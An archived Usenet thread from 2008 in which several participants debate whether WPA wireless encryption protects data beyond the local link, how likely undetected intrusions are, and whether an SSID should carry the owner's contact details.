> You should be. No matter how good you are, those systems are still
> vulnerable.
Of course they're "vulnerable", in one form or another. I've taken
measures, however, to reduce _known_ vulnerabilities to a minimum, to
limit the potential avenues of intrusion, and to increase the likelihood
that a compromise will be detected. That last one matters, and is what
permits me to not worry. Can undetected intrusion occur? Of course, at
least in theory. Is it likely? No.
>>> Again, wireless security ... will protect your network from
>>> sniffing.
>>
>> Only on that particular link.
>
> True, but that can be quite valuable as a part of the overall
> solution.
Only if your traffic isn't encrypted end-to-end by other means, which
means someone trying to sniff needs only to park himself somewhere
between the wired side of your wireless access point, and the sensitive
data's destination.
> ... it's a matter of relative risks, and the risk of open wireless is
> orders of magnitude greater than the risk on the Internet backbone.
Consider the layers above the backbone. Your traffic does not pass from
personal wireless link, to backbone, to destination host. There are
other layers involved. The security of the data in transit is only as
good as the weakest form of security applied to it within the entire
end-to-end trajectory.
>>> WPA does protect your computer from attack over the wireless
>>> network.
>>
>>... and it does so by controlling access to your network.
>
> Actually it encrypts the traffic.
Encrypting the traffic (over a single short network link) has nothing to
do with the previous statement of protecting the computer from attack
over the wireless network.
>> WPA provides access control and encryption over one network link. It
>> works well for that. Most people need their data protected between
>> two endpoints that span multiple network links. WPA falls short on
>> that.
>
> I disagree on both counts. Feel free to provide real evidence to back
> up those contentions.
Try getting onto a WPA-secured network for which you don't know the
"key", and see "evidence" that it works well at providing access control.
Start examining some packet traces, of traffic over both the WPA-secured
wireless network, where you'll see that WPA works well at encrypting
traffic over that link, then the same traffic over the wired portion of
the network after it leaves the AP, and see WPA fall short. Need more
evidence than that?
>John Navas wrote:
>
>> While your point is valid in principle, in practice it's far more
>> difficult to snoop wired Internet traffic than open wireless traffic.
>
>That really depends on which side of the network you're sitting on.
>Where I sit, they're both equally trivial. Where the average
>script-kiddie sits, perhaps you're right, but the really serious threats
>are usually "on the inside", where, once again, they're equally trivial.
I respectfully disagree. Snooping of wireless traffic is orders of
magnitude more likely than snooping of wired traffic, and the really
serious threats aren't hard things like snooping of wired Internet
traffic -- they are relatively easy things like website compromise,
cross-site scripting attacks, and the like.
<http://www.theregister.co.uk/2008/04/16/mystery_web_compromise_unpicked/>
<http://www.channelregister.co.uk/2008/06/05/scansafe_web_malware_survey/>
<http://www.channelregister.co.uk/2008/07/30/websense_high_profile_website_malware_survey/>
>Of course they're "vulnerable", in one form or another. I've taken
>measures, however, to reduce _known_ vulnerabilities to a minimum, to
>limit the potential avenues of intrusion, and to increase the likelihood
>that a compromise will be detected. That last one matters, and is what
>permits me to not worry. Can undetected intrusion occur? Of course, at
>least in theory. Is it likely? No.
It's actually likely. The vast majority of intrusions go undetected,
even by folks with serious expertise. Your assumption is unwarranted,
and probably giving you a false sense of security.
>Only if your traffic isn't encrypted end-to-end by other means, which
>means someone trying to sniff needs only to park himself somewhere
>between the wired side of your wireless access point, and the sensitive
>data's destination.
It's hard if not impossible to encrypt *all* traffic end-to-end.
When browsing websites that don't support HTTPS for all traffic, as most
don't, then traffic is unencrypted over the public Internet even when
using VPN -- since the remote VPN endpoint isn't at the remote website,
part of the Internet path is unencrypted. Thus I use VPN when at an
open public hotspot (very high risk), but not when I'm using a wired
connection (very low risk).
To be clear, I do protect the transmission of sensitive information
(passwords, bank account numbers, credit card numbers, social security
number, etc), but I don't know of any practical way for me to encrypt
*everything*. If you really do know how to do it, then please educate
me... ;)
But then even with end-to-end encryption you are still vulnerable to
compromise of and at the other end, which is a far more likely risk.
I worry much more about the security of businesses on the Internet than
I do my own security and wired Internet security, and with good reason.
One of a great many cases in point:
"This week also saw the personal information of almost 1,000 bank
customers lost by an employee of Bank of Ireland, after the data was
copied onto an unencrypted USB memory stick."
>Consider the layers above the backbone. Your traffic does not pass from
>personal wireless link, to backbone, to destination host. There are
>other layers involved. The security of the data in transit is only as
>good as the weakest form of security applied to it within the entire
>end-to-end trajectory.
Sure, but I think you're worrying about the wrong problem. I don't take
precautions against being struck by meteorites while walking around outside,
but I do take precautions against getting hit by cars. I might be
killed by a meteorite, but I won't get hit by a car while worrying about
meteorites. ;)
>> Actually it encrypts the traffic.
>
>Encrypting the traffic (over a single short network link) has nothing to
>do with the previous statement of protecting the computer from attack
>over the wireless network.
Of course it does, since malware traffic can't be successfully injected
into the encrypted transmissions.
>> I disagree on both counts. Feel free to provide real evidence to back
>> up those contentions.
>
>Try getting onto a WPA-secured network for which you don't know the
>"key", and see "evidence" that it works well at providing access control.
>Start examining some packet traces, of traffic over both the WPA-secured
>wireless network, where you'll see that WPA works well at encrypting
>traffic over that link, then the same traffic over the wired portion of
>the network after it leaves the AP, and see WPA fall short. Need more
>evidence than that?
Yes, I need real evidence that snooping of traffic over the wired
Internet is a *significant* (not just theoretical) risk, especially as
compared to other risks.
> I respectfully disagree. Snooping of wireless traffic is orders of
> magnitude more likely than snooping of wired traffic, and the really
> serious threats aren't hard things like snooping of wired Internet
> traffic -- they are relatively easy things like website compromise,
> cross-site scripting attacks, and the like.
Ummmm.... and WPA on the local wireless link protects against these?
How? I think you're drifting off the point.
>> Can undetected intrusion occur? Of course, at least in theory. Is
>> it likely? No.
>
> It's actually likely. The vast majority of intrusions go undetected,
> even by folks with serious expertise. Your assumption is unwarranted,
> and probably giving you a false sense of security.
Who's making the unwarranted assumption here? You know nothing about
my systems or about what I know or can detect about them. The thing
about undetected intrusion, of course, is that by definition, you never
know if one has happened. However, if you know your systems well, and
you know how to protect them, you can be pretty sure of raising the bar
of the skill level that would be required for an undetected intrusion.
You raise that bar high enough, and the question becomes whether or not
it's worth the effort for the would-be intruder.
Would I claim that I can single-handedly properly secure financial data
or medical data on a database server? (well, I did do one of those in
the past) No; I'm not trying to be arrogant. However, I have plenty
of experience protecting what I would consider non-critical personal
information (mine and others') on computer systems. Could I have done
even better? Probably, yes. Have I ever had a system compromised?
Once, many years ago, via a then-recently discovered vulnerability in
FTP server software on a system I was managing. Undetected? Only
briefly ...
> It's hard if not impossible to encrypt *all* traffic end-to-end.
Not *all* traffic contains sensitive data. Do I really care if you can
sniff my Google searches and their results? Protect what's worth
protecting.
Does WPA on a single network link do all that much to protect your
username and password if you use POP or IMAP to read mail? I suppose
it does if your only concern is protecting your credentials from the
neighborhood teens. I prefer to avoid unencrypted protocols like POP
or IMAP. If you use "secure POP" (POP/TLS) or "secure IMAP", it
wouldn't matter if WPA wasn't available.
> But then even with end-to-end encryption you are still vulnerable to
> compromise of and at the other end, which is a far more likely risk.
It isn't "end-to-end" if it isn't "application-to-application". WPA, as
you know, won't protect your data at the other end. If the risk is far
more likely, what protection does WPA offer?
> I worry much more about the security of businesses on the Internet
> than I do my own security and wired Internet security, and with good
> reason.
That's a big part of the problem, yes: people ("businesses") making
false assumptions about computer and network security, and those false
assumptions lead to compromised data, usually because not enough emphasis
was placed on protecting that data in the right places. "hard crusty
exterior with a soft chewy center ..." Businesses "believe" their data
is "secure" because they've deployed a "firewall". How is that
different from individuals believing their personal computers are "secure"
because they've enabled WPA on their wireless access points?
> One of a great many cases in point:
>
> "This week also saw the personal information of almost 1,000 bank
> customers lost by an employee of Bank of Ireland, after the data
> was copied onto an unencrypted USB memory stick."
I bet they had HTTPS for authenticated access to their web servers, and
WPA-protected wireless local networks, though. They took the steps
recommended to them by computer security "experts", yet still failed to
protect their sensitive data. Thank you for helping make my point. :-)
> Sure, but I think you're worrying about the wrong problem.
No, I'm worrying about understanding what it is I'm protecting, where,
from what or whom, and why. I use WPA on my wireless network at home
(and incorporated EAP-TTLS with dynamically negotiated encryption for a
large wireless network I did in my previous employment), because it keeps
outsiders from being able to use my network, not because it encrypts any
personal information that might pass over that link. The protection of
the sensitive data passing over the wireless link is taken care of by
other means, and that data would be protected regardless of the encryption
on the wireless link. That's been my point all along, and it is that
which I feel others missed from Schneier's article (recall that's what
caused me to join the discussion), largely because the article makes no
explicit mention of it. It is, however, quite visible in its absence.
>>> I disagree on both counts. Feel free to provide real evidence to
>>> back up those contentions.
>>
> ... I need real evidence that snooping of traffic over the wired
> Internet is a *significant* (not just theoretical) risk, especially as
> compared to other risks.
Wait a minute ... The points that you disagree with above, and for
which I explained a simple means by which you can observe them in action
("evidence") are the following:
>>>> WPA provides access control and encryption over one network link.
>>>> It works well for that. Most people need their data protected
>>>> between two endpoints that span multiple network links. WPA falls
>>>> short on that.
Now you want evidence that *wired* connections are vulnerable to
snooping. See HTTPS (and other TLS-tunneled protocols) for such
evidence. It long predates WPA, and even WEP. Are you suggesting that
it's really a no-op and is protecting against an insignificant threat?
See also the above quote you provided about Bank of Ireland's customer
data. Would WPA have helped there, or would better protection of the
data in transit have been warranted?
>* Make your wireless SSID unique. This helps avoid network collisions. A
>good way to do this is to use your address, phone number, and/or name
>for your SSID (making it easy for you to be contacted if something is
>wrong with your wireless network).
* True story of network collision problem:
A client complained to me that the home office wireless Internet had
always been very flaky, that even having the (shudder) Geek Squad come
out hadn't really helped, and asked me if anything affordable could be
done about the problem. Sure enough I had trouble getting and keeping a
connection with a laptop. Even moving closer to the wireless access
point didn't help. That was sufficiently odd that I decided to start
over from scratch, loading the latest router firmware, resetting to
factory defaults, and then running through my standard initial setup
routine for wireless networking. And voilà! Strong, solid connection,
excellent performance.
While I was working my client gave me a rundown on the Geek Squad, how
they had come out to fix the first wireless, couldn't get it working,
had to come back out to swap the wireless router for a different brand,
got that working albeit poorly, told my client it was poor because the
laptop was old, and left.
I probed a bit and learned the first wireless router had been brand L,
that the Geek Squad had swapped it for brand N when they couldn't make
it work, and that the laptop had then started working so they didn't
even touch it. Thus the laptop was still configured for brand L, and
what was actually happening was that it was connecting to a neighbor's
open wireless, not the new brand N wireless router, because the Geek
Squad were using factory defaults and no security. In 1-1/2 years of
paying for broadband my client had never actually used it, or the
expensive wireless router for that matter.
That wouldn't have happened, of course, if the Geek Squad had configured
a unique SSID in the first place, any sort of wireless security, or
otherwise had any real clue about wireless networking. (Likewise the
neighbor.) But I guess I shouldn't complain -- puts food on my table.
:)
* True story of network identification problem:
Before installing a wireless network for another client I did a site
survey (my normal practice), and found a strong signal on channel 1 and
another strong signal on channel 9 (go figure), leaving me with no clear
channel to use. The "easy" solution, of course, would be to persuade
the neighbor on channel 9 to switch to either channel 6 or channel 11.
Actually not so easy since the default SSID gave no clue as to who was
running that wireless network. Worse, my client was in a multi-unit
complex that left us with quite a few possibilities, which meant
knocking on a lot of doors, which had to wait until evening. It would
have been much faster and easier if the SSID identified the network
operator.
>John Navas wrote:
>
>> I respectfully disagree. Snooping of wireless traffic is orders of
>> magnitude more likely than snooping of wired traffic, and the really
>> serious threats aren't hard things like snooping of wired Internet
>> traffic -- they are relatively easy things like website compromise,
>> cross-site scripting attacks, and the like.
>
>Ummmm.... and WPA on the local wireless link protects against these?
Straw man argument: I didn't say or even suggest that.
>How? I think you're drifting off the point.
I was rebutting *your* claims.
>>> Can undetected intrusion occur? Of course, at least in theory. Is
>>> it likely? No.
>>
>> It's actually likely. The vast majority of intrusions go undetected,
>> even by folks with serious expertise. Your assumption is unwarranted,
>> and probably giving you a false sense of security.
>
>Who's making the unwarranted assumption here?
I'm making no assumption there.
>You know nothing about
>my systems or about what I know or can detect about them.
You have no way of knowing what you cannot detect or have not detected.
>The thing
>about undetected intrusion, of course, is that by definition, you never
>know if one has happened. However, if you know your systems well, and
>you know how to protect them, you can be pretty sure of raising the bar
>of the skill level that would be required for an undetected intrusion.
>You raise that bar high enough, and the question becomes whether or not
>it's worth the effort for the would-be intruder.
Again, your assumption is unwarranted, and probably giving you a false
sense of security. You have no way of knowing how high you've raised
the bar relative to potential attackers, or even if you've raised the
bar at all. All you can do is be as thorough as you can, *hope* it's
enough, and keep checking that hope in different ways.
>... Have I ever had a system compromised?
>Once, many years ago, via a then-recently discovered vulnerability in
>FTP server software on a system I was managing. Undetected? Only
>briefly ...
Again, your assumption is unwarranted, and probably giving you a false
sense of security. You have no way of knowing if you were compromised
or not. All you can say is that you don't know you were compromised.
>> It's hard if not impossible to encrypt *all* traffic end-to-end.
>
>Not *all* traffic contains sensitive data. Do I really care if you can
>sniff my Google searches and their results? Protect what's worth
>protecting.
Putting aside the fact that you've just backed away from your sweeping
claim, Google searches *can* be worth protecting. Should (say) a
prospective employer or insurer get wind of the fact that you're
repeatedly searching for cancer treatments, there might well be negative
consequences. Again, your assumption is unwarranted, and probably
giving you a false sense of security.
>Does WPA on a single network link do all that much to protect your
>username and password if you use POP or IMAP to read mail? I suppose
>it does if your only concern is protecting your credentials from the
>neighborhood teens. I prefer to avoid unencrypted protocols like POP
>or IMAP. If you use "secure POP" (POP/TLS) or "secure IMAP", it
>wouldn't matter if WPA wasn't available.
Another straw man argument: What WPA protects is *all* wireless
traffic, not just *some* wireless traffic.
>> But then even with end-to-end encryption you are still vulnerable to
>> compromise of and at the other end, which is a far more likely risk.
>
>It isn't "end-to-end" if it isn't "application-to-application".
You missed the point. Read what I wrote more carefully.
>WPA, as
>you know, won't protect your data at the other end. If the risk is far
>more likely, what protection does WPA offer?
None for that risk. What WPA does (as I'm sure you know) is protect
against the much higher risk of wireless snooping.
>... Businesses "believe" their data
>is "secure" because they've deployed a "firewall". How is that
>different from individuals believing their personal computers are "secure"
>because they've enabled WPA on their wireless access points?
They hopefully just believe their *wireless* is secure, which is true.
>> One of a great many cases in point:
>>
>> "This week also saw the personal information of almost 1,000 bank
>> customers lost by an employee of Bank of Ireland, after the data
>> was copied onto an unencrypted USB memory stick."
>
>I bet they had HTTPS for authenticated access to their web servers, and
>WPA-protected wireless local networks, though. They took the steps
>recommended to them by computer security "experts", yet still failed to
>protect their sensitive data. Thank you for helping make my point. :-)
Doesn't prove your point, but you are of course free to think and claim
whatever you want.
>> Sure, but I think you're worrying about the wrong problem.
>
>No, I'm worrying about understanding what it is I'm protecting, where,
>from what or whom, and why. ...
I think we'll just have to agree to disagree.
>> ... I need real evidence that snooping of traffic over the wired
>> Internet is a *significant* (not just theoretical) risk, especially as
>> compared to other risks.
>
>Wait a minute ... The points that you disagree with above, and for
>which I explained a simple means by which you can observe them in action
>("evidence") are the following:
Nope. Still waiting for your evidence.
>Now you want evidence that *wired* connections are vulnerable to
>snooping.
Assuming you're not deliberately resorting to straw man arguments, read
what I wrote more carefully.
Like Jeff, I'm getting tired of this increasingly pointless debate, so
I'm going to give you the last word and be done with it.
Come now. The man, allegedly a security expert, allegedly writes an
article dissing wireless security, and ends up saying he doesn't see the
point in securing his network, given what he's said above. What
conclusion would the innocent draw from that?
> Sylvain Robitaille wrote
>>Now you want evidence that *wired* connections are vulnerable to
>>snooping.
> Still waiting for your evidence.
Are you really that sanguine concerning well-documented and likely
but undocumented domestic surveillance?
Michael
(snip story which boils down to 'uniquely identify your network so you
/know/ you're connecting to it'.)
> That wouldn't have happened, of course, if the Geek Squad had configured
> a unique SSID in the first place, any sort of wireless security, or
> otherwise had any real clue about wireless networking. (Likewise the
> neighbor.)
Absolutely agree.
> Before installing a wireless network for another client I did a site
> survey (my normal practice), and found a strong signal on channel 1 and
> another strong signal on channel 9 (go figure), leaving me with no clear
> channel to use. The "easy" solution, of course, would be to persuade
> the neighbor on channel 9 to switch to either channel 6 or channel 11.
> Actually not so easy since the default SSID gave no clue as to who was
> running that wireless network. Worse, my client was in a multi-unit
> complex that left us with quite a few possibilities, which meant
> knocking on a lot of doors, which had to wait until evening. It would
> have been much faster and easier if the SSID identified the network
> operator.
What wireless needs is a way to say "who the heck are you?" and for
end-users to be able to configure a response. Oh, wait, snmp... :-)
Only a very small fraction of Internet traffic is screened by the
government, and while I strongly object to the practice, I have nothing
directly to fear from it.
>On Tue, 02 Dec 2008 17:46:55 -0600, msg <msg@_cybertheque.org_> wrote in
><l6-dnVFvGrBHVajU...@posted.cpinternet>:
>
>>John Navas wrote:
>>
>>> Sylvain Robitaille wrote
>>
>>>>Now you want evidence that *wired* connections are vulnerable to
>>>>snooping.
>>
>>> Still waiting for your evidence.
>>
>>Are you really that sanguine concerning well-documented and likely
>>but undocumented domestic surveillance?
>
>Only a very small fraction of Internet traffic is screened by the
>government, and while I strongly object to the practice, I have nothing
>directly to fear from it.
p.s. IMHO there's a higher risk to me from poorly screened folks
working for Internet transit providers, but that risk is still too small
for me to worry much about.
>John Navas wrote:
>> Before installing a wireless network for another client I did a site
>> survey (my normal practice), and found a strong signal on channel 1 and
>> another strong signal on channel 9 (go figure), leaving me with no clear
>> channel to use. The "easy" solution, of course, would be to persuade
>> the neighbor on channel 9 to switch to either channel 6 or channel 11.
>> Actually not so easy since the default SSID gave no clue as to who was
>> running that wireless network. Worse, my client was in a multi-unit
>> complex that left us with quite a few possibilities, which meant
>> knocking on a lot of doors, which had to wait until evening. It would
>> have been much faster and easier if the SSID identified the network
>> operator.
>
>What wireless needs is a way to say "who the heck are you?" and for
>end-users to be able to configure a response. Oh, wait, snmp... :-)
Oh, wait, SNMP won't work when you can't connect to the network.
Or when the user isn't running suitable software and paying attention.
("What, a router log?")
My suggestion is much simpler and more practical.
>>> I respectfully disagree. Snooping of wireless traffic is orders of
>>> magnitude more likely than snooping of wired traffic, and the really
>>> serious threats aren't hard things like snooping of wired Internet
>>> traffic -- they are relatively easy things like website compromise,
>>> cross-site scripting attacks, and the like.
>>
>> Ummmm.... and WPA on the local wireless link protects against these?
>
> Straw man argument: I didn't say or even suggest that.
The discussion at hand is about Bruce Schneier's article regarding his
unsecured wireless network, with most participants agreeing that such a
configuration is generally unadvisable. Perhaps you missed that part.
We seem to be disagreeing on the details of *how* the secured network is
beneficial, leading to the discussion above where you stray further from
the main point of discussion. Your response to an attempt to maintain the
focus of the discussion is apparently to declare "straw man", presumably
so you can continue adding more tangential points to the discussion. Ok.
>>How? I think you're drifting off the point.
>
> I was rebutting *your* claims.
My "claims" were that a WPA secured wireless network does not protect
(potentially sensitive) data in transit beyond the wireless link,
therefore that data is better protected by other means (such as end-to-end
encryption of the data). Which part of the above is a rebuttal to
that claim?
> You have no way of knowing if you were compromised or not.
Oh no. That's definitely not true. I can tell you with certainty that
a compromise happened if I find one. If I *don't* find a compromise,
however, all I can tell you (with certainty) is that I've not found one.
> Putting aside the fact that you've just backed away from your sweeping
> claim, ...
I don't recall making a "sweeping claim". Care to remind me?
>> Does WPA on a single network link do all that much to protect your
>> username and password if you use POP or IMAP to read mail? ...
>
> Another straw man argument: What WPA protects is *all* wireless
> traffic, not just *some* wireless traffic.
Yes, it encrypts all the traffic on that one link. *All* the traffic then
(usually) travels on wired networks to its destination. The question
stands.
> ... What WPA does ... is protect against the much higher risk of
> wireless snooping.
WPA protects the access to the wireless network. Those are the "P" and
the "A" in WPA. I'll leave it to you to sort out the "W". One can't
"snoop" a network that one cannot access, but that's only part of the
equation.
>> ... Businesses "believe" their data is "secure" because they've
>> deployed a "firewall". How is that different from individuals
>> believing their personal computers are "secure" because they've enabled
>> WPA on their wireless access points?
>
> They hopefully just believe their *wireless* is secure, which is true.
Yes, hopefully, but that's not what I've been reading in this thread ...
I've been reading about "protecting computers from attack" by securing
access to the wireless network. I've been reading how protecting
the wireless link with WPA is easier than end-to-end encrypting data
in transit, so that's the security that must be in place. I've been
reading that sensitive data won't be intercepted if it's encrypted over
a single wireless link (with no mention of protecting that data beyond
the wireless link).
> I think we'll just have to agree to disagree.
Yes, on that we can agree.
>> Wait a minute ... The points that you disagree with above, and for
>> which I explained a simple means by which you can observe them in
>> action ("evidence") are the following:
>
> Nope. Still waiting for your evidence.
Well, then your disagreement was placed within the wrong context, and
the evidence you seek isn't clear.
> Like Jeff I'm getting tired of this increasingly pointless debate, so
> I'm going to give you the last word and be done with it.
I bet you won't, but I've made my point.
>> What wireless needs is a way to say "who the heck are you?" and for
>> end-users to be able to configure a response. Oh, wait, snmp... :-)
>
> Oh, wait, SNMP won't work when you can't connect to the network.
Indeed. I didn't say it was a fully formed solution, I was merely
pointing out that technologies exist to do this properly.
> Or when the user isn't running suitable software and paying attention.
> ("What, a router log?")
Indeed; however, if router makers were clueful, their "setup" CD could
solve this problem by asking for the relevant info.
>
> My suggestion is much simpler and more practical.
Sure, it's a hack though. A proper solution shouldn't rely on misusing
an identifier field that isn't really long enough and which is freeform
text. Professionally I encounter this all the time: "there's nowhere to
put the UK post-code and the US Zip field is sanity checked, so let's use
the 'alternate email' field instead". Terrific, until someone needs two
email addys... :-)
>John Navas wrote:
>> On Tue, 02 Dec 2008 23:18:35 +0000, Mark McIntyre
>
>>> What wireless needs is a way to say "who the heck are you?" and for
>>> end-users to be able to configure a response. Oh, wait, snmp... :-)
>>
>> Oh, wait, SNMP won't work when you can't connect to the network.
>
>Indeed. I didn't say it was a fully formed solution, I was merely
>pointing out that technologies exist to do this properly.
Except they don't. What's needed is something that can work *without* a
working connection. Like identification in the SSID. Fully formed.
Works well. Makes sense. Just too low tech for you? ;)
>> Or when the user isn't running suitable software and paying attention.
>> ("What, a router log?")
>
>Indeed; however, if router makers were clueful, their "setup" CD could
>solve this problem by asking for the relevant info.
Some wireless routers do at least now set up reasonable security, but I
doubt that any manufacturers will see sufficient payback in your
suggestion -- after all, the security issue only got addressed when the
problem got to be overwhelming.
>> My suggestion is much simpler and more practical.
>
>Sure, it's a hack though.
Like many good solutions. :)
But not really -- SSID is actually an "ID" string.
>A proper solution shouldn't rely on misusing
>an identifier field
There's no misuse.
SSID is actually an "ID" string.
>that isn't really long enough
64 characters gets the job done for me.
What would you have to say that needs more than that?
>and which is freeform
>text.
[shrug]
>Professionally I encounter this all the time 'there's nowhere to
>put the UK post-code and the US Zip field is sanity checked so lets use
>the "alternate email" field instead'. Terrific - until someone needs two
>email addys... :-)
Installed a wireless network last week with the SSID containing name,
street address and phone number. Seems sufficient to me, but as always,
YMMV.
You just can't resist, can you? I've already agreed that SNMP isn't a
full solution, how about just stopping being so superior?
> What's needed is something that can work *without* a
> working connection. Like identification in the SSID. Fully formed.
> Works well. Makes sense. Just too low tech for you? ;)
You just can't resist being offensive, can you?
> Installed a wireless network last week with the SSID containing name,
> street address and phone number. Seems sufficient to me, but as always,
> YMMV.
We've been over this ground. I'm not interested.
>John Navas wrote:
>> On Wed, 03 Dec 2008 23:00:40 +0000, Mark McIntyre
>> <markmc...@TROUSERSspamcop.net> wrote in
>> <scEZk.151182$c47.1...@en-nntp-06.am2.easynews.com>:
>>
>>> John Navas wrote:
>>>> On Tue, 02 Dec 2008 23:18:35 +0000, Mark McIntyre
>>>>> What wireless needs is a way to say "who the heck are you?" and for
>>>>> end-users to be able to configure a response. Oh, wait, snmp... :-)
>>>> Oh, wait, SNMP won't work when you can't connect to the network.
>>> Indeed. I didn't say it was a fully formed solution, I was merely
>>> pointing out that technologies exist to do this properly.
>>
>> Except they don't.
>
>You just can't resist, can you?
When you blow smoke I can't.
>I've already agreed that SNMP isn't a
>full solution, how about just stopping being so superior?
It's not any sort of solution, since it presupposes a connection that's
the whole point of the issue.
>> What's needed is something that can work *without* a
>> working connection. Like identification in the SSID. Fully formed.
>> Works well. Makes sense. Just too low tech for you? ;)
>
>You just can't resist being offensive, can you?
Just a funny dig, but you apparently have a very thin skin.
In other words, you can dish it out, but you can't take it.
>> Installed a wireless network last week with the SSID containing name,
>> street address and phone number. Seems sufficient to me, but as always,
>> YMMV.
>
>We've been over this ground. I'm not interested.
Why am I not surprised?
--
Best regards,
John Navas <http:/navasgroup.com>
"A little learning is a dangerous thing." [Alexander Pope]
"It is better to sit in silence and appear ignorant,
than to open your mouth and remove all doubt." [Mark Twain]
"Being ignorant is not so much a shame, as being unwilling to learn."
[Benjamin Franklin]